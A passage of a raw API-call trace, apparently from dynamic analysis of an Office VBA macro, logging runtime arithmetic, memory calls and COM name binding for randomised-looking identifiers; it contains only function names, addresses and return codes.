(TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.951] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe478, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.951] VarCmp (pvarLeft=0xaefe448, pvarRight=0xaefe430, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.951] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe418, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.951] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.951] VarDiv (in: pvarLeft=0xaefe3e8, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.951] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.951] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.951] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe370, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.951] VarAdd (in: pvarLeft=0xaeff240, pvarRight=0xaeff018, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.951] VarAdd (in: pvarLeft=0xaeff6b0, pvarRight=0xaefedf0, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.951] VarAdd (in: pvarLeft=0xaeff620, pvarRight=0xaefeac0, pvarResult=0xaeff5f0 | out: pvarResult=0xaeff5f0) returned 0x0 [0069.951] VarAdd (in: pvarLeft=0xaeff5f0, pvarRight=0xaefe898, pvarResult=0xaeff590 | out: pvarResult=0xaeff590) returned 0x0 [0069.951] VarAdd (in: pvarLeft=0xaeff590, pvarRight=0xaefe568, pvarResult=0xaeff560 | out: pvarResult=0xaeff560) returned 0x0 [0069.951] VarAdd (in: pvarLeft=0xaeff560, pvarRight=0xaefe340, pvarResult=0xaeff518 | out: pvarResult=0xaeff518) returned 0x0 [0069.951] VarAdd (in: pvarLeft=0xaeffdd8, pvarRight=0xaeffdc0, pvarResult=0xaeffda8 | out: pvarResult=0xaeffda8) returned 0x0 [0069.952] IMalloc:Realloc (This=0x7fefec05380, pv=0x62fddf0, cb=0x53e) returned 0x659aad0 [0069.952] IMalloc:Free (This=0x7fefec05380, pv=0x680ab20) [0069.952] GetCurrentProcess () returned 0xffffffffffffffff [0069.952] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb6a38, dwSize=0x8) returned 1 [0069.952] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb6238, dwSize=0x8) returned 1 [0069.952] GetCurrentProcess () returned 0xffffffffffffffff [0069.953] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb62f8, dwSize=0x8) returned 1 [0069.953] GetCurrentProcess () returned 0xffffffffffffffff [0069.953] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb68b8, dwSize=0x8) returned 1 [0069.953] GetCurrentProcess () returned 0xffffffffffffffff [0069.953] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb6978, dwSize=0x8) returned 1 [0069.953] GetCurrentProcess () returned 0xffffffffffffffff [0069.953] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb6a38, dwSize=0x8) returned 1 [0069.953] GetCurrentProcess () returned 0xffffffffffffffff [0069.953] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb6de0, dwSize=0x8) returned 1 [0069.953] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.953] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1462d8 | out: ppvObject=0x1462d8*=0x0) returned 0x80004002 [0069.953] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1462d0 | out: ppvObject=0x1462d0*=0x0) returned 0x80004002 [0069.953] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.953] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.953] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1462d8 | out: ppvObject=0x1462d8*=0x0) returned 0x80004002 [0069.953] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1462d0 | out: ppvObject=0x1462d0*=0x0) returned 0x80004002 [0069.953] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.953] VarCmp (pvarLeft=0xaeff6e0, pvarRight=0xaeff6c8, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.953] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff698, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.953] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.953] VarDiv (in: pvarLeft=0xaeff650, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.953] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.953] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.953] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff378, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.953] VarCmp (pvarLeft=0xaeff348, pvarRight=0xaeff330, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.953] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff318, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.953] sqrt (_X=0x3) returned 0x41b0000000000000 [0069.954] VarDiv (in: pvarLeft=0xaeff2e8, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.954] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.954] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.954] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff270, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.954] VarAdd (in: pvarLeft=0xaeffda8, pvarRight=0xaeffd78, pvarResult=0xaeffd48 | out: pvarResult=0xaeffd48) returned 0x0 [0069.954] IMalloc:Realloc (This=0x7fefec05380, pv=0x6844090, cb=0x2000) returned 0x6288170 [0069.956] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf17100, cb=0x400) returned 0xafa6b90 [0069.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xafc48f2, cbMultiByte=3, lpWideCharStr=0x45236d6, cchWideChar=8 | out: lpWideCharStr="ess") returned 3 [0069.958] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf17310, cb=0x400) returned 0xafa7bd0 [0069.958] IMalloc:Realloc (This=0x7fefec05380, pv=0x682e6d0, cb=0x40) returned 0x68de960 [0069.958] IMalloc:Realloc (This=0x7fefec05380, pv=0x682e730, cb=0x50) returned 0x680ab20 [0069.958] IUnknown:QueryInterface (in: This=0xaf0b688, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144db0 | out: ppvObject=0x144db0*=0x0) returned 0x80004002 [0069.958] IUnknown:QueryInterface (in: This=0xaf0b688, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144d80 | out: ppvObject=0x144d80*=0x0) returned 0x80004002 [0069.958] IUnknown:QueryInterface (in: This=0xaf0b688, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144d70 | out: ppvObject=0x144d70*=0x0) returned 0x80004002 [0069.958] IUnknown:QueryInterface (in: This=0xaf0b688, riid=0x7fee3b30b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144d78 | out: ppvObject=0x144d78*=0x0) returned 0x80004002 [0069.958] ITypeInfo:RemoteGetTypeAttr (in: This=0xaf0b688, ppTypeAttr=0x144da8, pDummy=0x10 | out: ppTypeAttr=0x144da8, pDummy=0x10) returned 0x0 [0069.958] ITypeInfo:LocalReleaseTypeAttr (This=0xaf0b688) returned 0x0 [0069.958] IUnknown:AddRef (This=0xaf0b688) returned 0x3 [0069.958] IUnknown:Release (This=0xaf0b688) returned 0x2 [0069.958] IUnknown:QueryInterface (in: This=0xaf0b688, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.958] IUnknown:QueryInterface (in: This=0xaf0b688, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.958] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b688, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.958] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.959] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.959] IUnknown:Release (This=0x665ba50) returned 0xf [0069.959] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b688, memid=1610612740, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.959] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b688, memid=1610612740, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.959] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b688, memid=1610612740, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.959] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafbd870, dwSize=0x4b) returned 1 [0069.959] IMalloc:Free (This=0x7fefec05380, pv=0xafbd870) [0069.959] IMalloc:Alloc (This=0x7fefec05380, cb=0x230) returned 0xafdb820 [0069.959] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf543a0, cb=0x200) returned 0xaf17310 [0069.959] ITypeComp:RemoteBind (in: This=0x665ba60, szName="EQXUxQA", lHashVal=0x10f890, wFlags=0x8, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb234a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="EQXUxQA") returned 8 [0069.959] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="EQXUxQA", lHashVal=0x10f890, wFlags=0x8, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb234a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="EQXUxQA") returned 8 [0069.959] ITypeComp:RemoteBind (in: This=0x665bd30, szName="EQXUxQA", lHashVal=0x10f890, wFlags=0x8, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.959] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EQXUxQA") returned 0x10f890 [0069.959] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="EQXUxQA" | out: _Dst="EQXUxQA") returned 0x0 [0069.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="EQXUxQA") returned 8 [0069.960] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.960] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="EQXUxQA", lHashVal=0x10f890, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.960] IUnknown:Release (This=0x665ba50) returned 0xf [0069.960] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.960] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="EQXUxQA", lHashVal=0x10f890, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.960] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.960] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.960] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="EQXUxQA", lHashVal=0x10f890, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.960] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.960] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.960] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="EQXUxQA", lHashVal=0x10f890, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.960] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb234a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="EQXUxQA") returned 8 [0069.960] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="EQXUxQA", lHashVal=0x10f890, wFlags=0x8, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.960] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x68767a0 [0069.960] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3cb234a | out: _Dst=0x68767a0) returned 0x0 [0069.960] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_EQXUxQA") returned 0x10fc14 [0069.960] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_EQXUxQA" | out: _Dst="_B_var_EQXUxQA") returned 0x0 [0069.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_EQXUxQA") returned 15 [0069.960] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.960] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_EQXUxQA", lHashVal=0x10fc14, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.960] IUnknown:Release (This=0x665ba50) returned 0xf [0069.960] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.960] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_EQXUxQA", lHashVal=0x10fc14, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.960] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.960] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.960] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_EQXUxQA", lHashVal=0x10fc14, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.961] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.961] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.961] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_EQXUxQA", lHashVal=0x10fc14, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.961] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.961] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.961] IUnknown:Release (This=0x665ba50) returned 0xf [0069.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa9d187e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_EQXUxQA") returned 15 [0069.961] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_EQXUxQA", lHashVal=0x10fc14, wFlags=0x8, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x45005f00720061, ppTypeComp=0x78005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x45005f00720061, ppTypeComp=0x78005500000000, pDummy=0x0) returned 0x0 [0069.961] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cb234a | out: _Dst=0x144ec0) returned 0x0 [0069.961] ITypeComp:RemoteBind (in: This=0x665ba60, szName="vAXUAx", lHashVal=0x106059, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2416, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="vAXUAx") returned 7 [0069.961] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="vAXUAx", lHashVal=0x106059, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2416, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="vAXUAx") returned 7 [0069.961] ITypeComp:RemoteBind (in: This=0x665bd30, szName="vAXUAx", lHashVal=0x106059, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.961] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vAXUAx") returned 0x106059 [0069.961] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="vAXUAx" | out: _Dst="vAXUAx") returned 0x0 [0069.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="vAXUAx") returned 7 [0069.961] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.962] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="vAXUAx", lHashVal=0x106059, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.962] IUnknown:Release (This=0x665ba50) returned 0xf [0069.962] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.962] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="vAXUAx", lHashVal=0x106059, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.962] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.962] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.962] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="vAXUAx", lHashVal=0x106059, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.962] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.962] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.962] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="vAXUAx", lHashVal=0x106059, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.962] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2416, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="vAXUAx") returned 7 [0069.962] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="vAXUAx", lHashVal=0x106059, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.962] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x68767a0 [0069.962] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3cb2416 | out: _Dst=0x68767a0) returned 0x0 [0069.962] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_vAXUAx") returned 0x10db02 [0069.962] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_vAXUAx" | out: _Dst="_B_var_vAXUAx") returned 0x0 [0069.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_vAXUAx") returned 14 [0069.962] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.962] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_vAXUAx", lHashVal=0x10db02, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.962] IUnknown:Release (This=0x665ba50) returned 0xf [0069.962] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.962] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_vAXUAx", lHashVal=0x10db02, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.962] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.962] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.962] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_vAXUAx", lHashVal=0x10db02, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.962] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.962] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.963] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_vAXUAx", lHashVal=0x10db02, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.963] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.963] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.963] IUnknown:Release (This=0x665ba50) returned 0xf [0069.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa9d18ae, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_vAXUAx") returned 14 [0069.963] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_vAXUAx", lHashVal=0x10db02, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x76005f00720061, ppTypeComp=0x41005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x76005f00720061, ppTypeComp=0x41005500000000, pDummy=0x0) returned 0x0 [0069.963] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cb2416 | out: _Dst=0x144ec0) returned 0x0 [0069.963] ITypeComp:RemoteBind (in: This=0x665ba60, szName="L_BBww", lHashVal=0x103770, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 